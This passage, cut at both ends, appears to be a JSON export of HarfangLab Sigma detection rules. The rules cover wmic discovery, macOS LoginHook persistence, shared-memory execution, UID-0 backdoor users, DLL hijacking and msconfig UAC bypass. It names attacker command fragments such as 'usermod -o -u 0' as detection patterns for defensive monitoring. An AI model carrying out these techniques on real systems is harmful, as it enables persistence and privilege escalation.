PLUS 3\\Carte Services PLUS 3.exe'\n - '?:\\Program Files\\Carte Services PLUS 3\\Carte Services PLUS 3.exe'\n - '?:\\Program Files\\Microsoft Cloud Managed Desktop Extension\\CMDExtension\\Microsoft.Management.Services.CloudManagedDesktop.Agent.exe'\n - '?:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Carte Services PLUS 3\\Carte Services PLUS 3.exe'\n - '?:\\Program Files\\Centreon NSClient++\\Uninst.exe'\n - '?:\\Program Files\\BMC Software\\BladeLogic\\RSC\\RSCD.exe'\n - '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\bin\\ToolsIQ.exe'\n\n exclusion_palo_alto:\n - ParentImage:\n - '?:\\Program Files\\Palo Alto Networks\\GlobalProtect\\PanGPA.exe'\n - '?:\\Program Files\\Palo Alto Networks\\GlobalProtect\\PanGPSupport.exe'\n - GrandparentImage:\n - '?:\\Program Files\\Palo Alto Networks\\GlobalProtect\\PanGPA.exe'\n - '?:\\Program Files\\Palo Alto Networks\\GlobalProtect\\PanGPSupport.exe'\n\n exclusion_myhop:\n CommandLine: \"WMIC SERVICE WHERE 'Name=myhop.Socle.Exploitation.Agent' GET NAME, STARTMODE, State /FORMAT:csv\"\n\n exclusion_salt:\n GrandparentImage: '?:\\VMware\\UCP\\salt\\bin\\python.exe'\n\n exclusion_telemis:\n ParentImage: '?:\\telemis\\nemo\\localProbe\\Python*\\python.exe'\n CommandLine: 'wmic product get name'\n\n condition: selection_bin and (selection_susp_arguments or (all of selection_get_*) or (all of selection_list_*)) and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7c35843a-8300-4ad9-a736-8ba3927a525a",
"rule_name": "Generic Discovery via wmic.exe",
"rule_description": "Detects the execution of wmic.exe to dump users, processes, softwares or services.\nAttackers can use this utility to perform various types of reconnaissance.\nIt is recommended to analyze the process responsible for the execution of wmic.exe to look for malicious content or other malicious actions.\n",
"rule_creation_date": "2022-11-07",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1047"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7c489058-8e36-42b2-97cf-d19aad77fe92",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092723Z",
"creation_date": "2026-03-23T11:45:34.092725Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092729Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md",
"https://attack.mitre.org/techniques/T1037/002/",
"https://attack.mitre.org/techniques/T1547/007/"
],
"name": "t1037_002_login_script.yml",
"content": "title: New Login Script Added\nid: 7c489058-8e36-42b2-97cf-d19aad77fe92\ndescription: |\n Detects the addition of a new login script on macOS via defaults com.apple.loginwindow.LoginHook.\n Attackers may use a Login Hook to establish persistence by pointing it to a malicious script.\n A Login Hook is a plist file that points to a specific script to be executed with root privileges upon user logon.\n The plist file is located in the com.apple.loginwindow.plist file stored in /Library/Preferences/ and can be modified using the default command-line utility.\n It is recommended to investigate the content of the newly created plist file to determine if the login script is malicious.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md\n - https://attack.mitre.org/techniques/T1037/002/\n - https://attack.mitre.org/techniques/T1547/007/\ndate: 2022/07/21\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1037.002\n - attack.t1547.007\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\n - classification.macOS.Behavior.SystemModification\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/defaults'\n CommandLine|contains|all:\n - 'write'\n - 'com.apple.loginwindow'\n - 'LoginHook'\n condition: selection\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7c489058-8e36-42b2-97cf-d19aad77fe92",
"rule_name": "New Login Script Added",
"rule_description": "Detects the addition of a new login script on macOS via defaults com.apple.loginwindow.LoginHook.\nAttackers may use a Login Hook to establish persistence by pointing it to a malicious script.\nA Login Hook is a plist file that points to a specific script to be executed with root privileges upon user logon.\nThe plist file is located in the com.apple.loginwindow.plist file stored in /Library/Preferences/ and can be modified using the default command-line utility.\nIt is recommended to investigate the content of the newly created plist file to determine if the login script is malicious.\n",
"rule_creation_date": "2022-07-21",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1037.002",
"attack.t1547.007"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7c4f005e-0848-49fc-b9fb-72ccd0cc4fb6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624908Z",
"creation_date": "2026-03-23T11:45:34.624910Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624914Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md",
"https://attack.mitre.org/techniques/T1564/001/"
],
"name": "t1564_001_tmpfs_file_execution.yml",
"content": "title: Execution from a Shared Memory Path\nid: 7c4f005e-0848-49fc-b9fb-72ccd0cc4fb6\ndescription: |\n Detects a suspicious execution from a shared memory path.\n This is used to avoid dropping a malicious file on disk (fileless malware technique).\n This technique is used to bypass security products that use \"scan on write\" detection.\n As the file is never written to disk, it will never trigger the “scan on write” feature.\n It is recommended to check the legitimacy and origin of the process triggering this rule.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2021/10/11\nmodified: 2025/12/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.execution\n - attack.t1564.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.MemoryExecution\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|startswith:\n - '/dev/shm/'\n - '/var/run'\n - '/run/'\n\n exclusion_steam:\n - CommandLine:\n - '/sbin/ldconfig.real -f /run/pressure-vessel/ldso/ld.so.conf -C /run/pressure-vessel/ldso/new-ld.so.cache -X'\n - '/sbin/ldconfig.real -f /var/pressure-vessel/ldso/ld.so.conf -C /var/pressure-vessel/ldso/new-ld.so.cache -X'\n - '/sbin/ldconfig.real -XNv'\n - '/sbin/ldconfig -f /run/user/*/pressure-vessel/ldso/ld.so.conf -C /run/user/*/pressure-vessel/ldso/new-ld.so.cache -X'\n - '/sbin/ldconfig.real -p'\n ParentImage:\n - '/usr/lib/pressure-vessel/from-host/bin/pressure-vessel-adverb'\n - '/usr/lib/pressure-vessel/from-host/libexec/steam-runtime-tools-?/pv-adverb'\n - '*/steam-runtime/amd64/usr/bin/steam-runtime-identify-library-abi'\n - '/usr/bin/bash'\n - Image: '/run/host/usr/bin/localedef'\n\n exclusion_supervise:\n Image: '/run/s6/services/nginx/finish'\n ParentImage: '/bin/s6-supervise'\n\n exclusion_schroot:\n Image: '/run/schroot/mount/*'\n ParentImage: '/usr/bin/schroot'\n\n exclusion_podman:\n Image: '/run/podman-init'\n\n exclusion_go:\n Image: '/run/user/*/go-build*/*'\n ParentImage: '/usr/lib/go/bin/go'\n\n exclusion_container:\n - ParentImage: '/usr/local/bin/containerd-shim-runc-v2'\n - GrandparentImage: '/usr/local/bin/containerd-shim-runc-v2'\n - Ancestors|contains: '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_perl:\n Image|startswith: '/dev/shm/perl_build/perl-*/'\n\n exclusion_mysql:\n Image|startswith: '/dev/shm/perl_build/DBD-mysql-*/'\n\n exclusion_vessel:\n CommandLine|contains: '/var/pressure-vessel/ldso/'\n\n exclusion_grid:\n CommandLine|contains: '/NonLinLoc/src/bin/Grid2'\n\n exclusion_incus_agent:\n ParentImage: '/usr/lib/systemd/systemd'\n Image: '/run/incus_agent/incus-agent'\n\n exclusion_appimage:\n Image: '/run/user/*/appimagelauncherfs/*.AppImage'\n\n exclusion_argo:\n Image: '/var/run/argo/argoexec'\n\n exclusion_dia:\n Image: '/run/user/*/usr/bin/dia'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7c4f005e-0848-49fc-b9fb-72ccd0cc4fb6",
"rule_name": "Execution from a Shared Memory Path",
"rule_description": "Detects a suspicious execution from a shared memory path.\nThis is used to avoid dropping a malicious file on disk (fileless malware technique).\nThis technique is used to bypass security products that use \"scan on write\" detection.\nAs the file is never written to disk, it will never trigger the “scan on write” feature.\nIt is recommended to check the legitimacy and origin of the process triggering this rule.\n",
"rule_creation_date": "2021-10-11",
"rule_modified_date": "2025-12-10",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1564.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7c61f922-cea4-4ba4-af16-18a8abc4c6f2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071357Z",
"creation_date": "2026-03-23T11:45:34.071359Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071363Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://embracethered.com/blog/posts/2021/linux-user-uid-zero-backdoor/",
"https://attack.mitre.org/techniques/T1548/"
],
"name": "t1548_potential_backdoor_user_creation.yml",
"content": "title: Potential Backdoor User Creation\nid: 7c61f922-cea4-4ba4-af16-18a8abc4c6f2\ndescription: |\n Detects the creation of a backdoor user by modifying an existing user's UID to 0 (root) using the usermod command.\n Threat actors can use this technique to create privileged accounts that persist with root access while appearing as regular users.\n It is recommended to investigate the execution context of this command to determine its legitimacy.\nreferences:\n - https://embracethered.com/blog/posts/2021/linux-user-uid-zero-backdoor/\n - https://attack.mitre.org/techniques/T1548/\ndate: 2024/12/02\nmodified: 2025/11/24\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1548\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.SystemModification\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains:\n - 'usermod -u 0 -o'\n - 'usermod -o -u 0'\n\n exclusion_s6:\n GrandparentImage: '/package/admin/s6-*/command/s6-sudod'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7c61f922-cea4-4ba4-af16-18a8abc4c6f2",
"rule_name": "Potential Backdoor User Creation",
"rule_description": "Detects the creation of a backdoor user by modifying an existing user's UID to 0 (root) using the usermod command.\nThreat actors can use this technique to create privileged accounts that persist with root access while appearing as regular users.\nIt is recommended to investigate the execution context of this command to determine its legitimacy.\n",
"rule_creation_date": "2024-12-02",
"rule_modified_date": "2025-11-24",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7c7e9058-75b9-4939-9ef9-b2e9ed96ba71",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088675Z",
"creation_date": "2026-03-23T11:45:34.088677Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088681Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_easpolicymanagerbrokerhost.yml",
"content": "title: DLL Hijacking via easpolicymanagerbrokerhost.exe\nid: 7c7e9058-75b9-4939-9ef9-b2e9ed96ba71\ndescription: |\n Detects potential Windows DLL Hijacking via easpolicymanagerbrokerhost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'easpolicymanagerbrokerhost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\InprocLogger.dll'\n - '\\policymanager.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7c7e9058-75b9-4939-9ef9-b2e9ed96ba71",
"rule_name": "DLL Hijacking via easpolicymanagerbrokerhost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via easpolicymanagerbrokerhost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7cb0cf75-a365-4572-8532-982bf3b0ac2b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075638Z",
"creation_date": "2026-03-23T11:45:34.075640Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075645Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts#guest",
"https://attack.mitre.org/techniques/T1078/001/"
],
"name": "t1078_001_guest_account_authentication.yml",
"content": "title: Guest Account Authentication\nid: 7cb0cf75-a365-4572-8532-982bf3b0ac2b\ndescription: |\n Detects authentication of the guest account.\n This account is disabled by default and can be used by attackers to maintain access to victim system via a persistence.\n It is recommended to investigate action made within the newly created session.\nreferences:\n - https://learn.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts#guest\n - https://attack.mitre.org/techniques/T1078/001/\ndate: 2024/01/04\nmodified: 2025/01/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.initial_access\n - attack.t1078.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n service: security\ndetection:\n selection_eventid:\n Source: 'Microsoft-Windows-Security-Auditing'\n EventID: 4624\n LogonType:\n - '3'\n - '10'\n\n selection_account:\n - TargetUserSid|endswith: '-501'\n - SubjectUserSid|endswith: '-501'\n\n condition: all of selection_*\nlevel: medium\nconfidence: weak",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7cb0cf75-a365-4572-8532-982bf3b0ac2b",
"rule_name": "Guest Account Authentication",
"rule_description": "Detects authentication of the guest account.\nThis account is disabled by default and can be used by attackers to maintain access to victim system via a persistence.\nIt is recommended to investigate action made within the newly created session.\n",
"rule_creation_date": "2024-01-04",
"rule_modified_date": "2025-01-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.initial_access",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1078.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7d08cd8e-c2ae-417e-9c41-f658cc4b2ae3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601191Z",
"creation_date": "2026-03-23T11:45:34.601194Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601202Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fveprompt.yml",
"content": "title: DLL Hijacking via fveprompt.exe\nid: 7d08cd8e-c2ae-417e-9c41-f658cc4b2ae3\ndescription: |\n Detects potential Windows DLL Hijacking via fveprompt.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fveprompt.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\FVEAPI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7d08cd8e-c2ae-417e-9c41-f658cc4b2ae3",
"rule_name": "DLL Hijacking via fveprompt.exe",
"rule_description": "Detects potential Windows DLL Hijacking via fveprompt.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7d4609c4-41cd-4b61-90e3-fb44e96e7305",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077548Z",
"creation_date": "2026-03-23T11:45:34.077550Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077554Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_post_uac_bypass_msconfig.yml",
"content": "title: UAC Bypass Executed via msconfig\nid: 7d4609c4-41cd-4b61-90e3-fb44e96e7305\ndescription: |\n Detects a suspicious process execution by msconfig.exe.\n msconfig.exe is often abused by attackers for UAC bypasses due to its auto-elevate feature.\n It is recommended to investigate the newly created process and check for malicious behavior.\nreferences:\n - https://github.com/hfiref0x/UACME\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2024/10/08\nmodified: 2025/01/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Msconfig\n - classification.Windows.Behavior.UACBypass\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ProcessGrandparentIntegrityLevel: 'Medium'\n ProcessParentIntegrityLevel: 'High'\n ProcessIntegrityLevel: 'High'\n ProcessParentImage:\n - '?:\\windows\\system32\\msconfig.exe'\n - '?:\\windows\\SysWOW64\\msconfig.exe'\n\n filter_grand_parent:\n ProcessGrandparentImage:\n - '?:\\windows\\explorer.exe'\n - '?:\\Windows\\System32\\RuntimeBroker.exe'\n - '?:\\Windows\\System32\\control.exe'\n - '?:\\Windows\\System32\\CompMgmtLauncher.exe'\n\n filter_legitime_child:\n ProcessImage:\n - '?:\\windows\\System32\\Taskmgr.exe'\n - '?:\\WINDOWS\\system32\\mmc.exe'\n - '?:\\WINDOWS\\system32\\eventvwr.exe'\n - '?:\\WINDOWS\\system32\\control.exe'\n - '?:\\WINDOWS\\system32\\UserAccountControlSettings.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7d4609c4-41cd-4b61-90e3-fb44e96e7305",
"rule_name": "UAC Bypass Executed via msconfig",
"rule_description": "Detects a suspicious process execution by msconfig.exe.\nmsconfig.exe is often abused by attackers for UAC bypasses due to its auto-elevate feature.\nIt is recommended to investigate the newly created process and check for malicious behavior.\n",
"rule_creation_date": "2024-10-08",
"rule_modified_date": "2025-01-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7db54556-f600-4f15-a4cb-a45837a6edc6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 1,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.622557Z",
"creation_date": "2026-03-23T11:45:34.596737Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596745Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
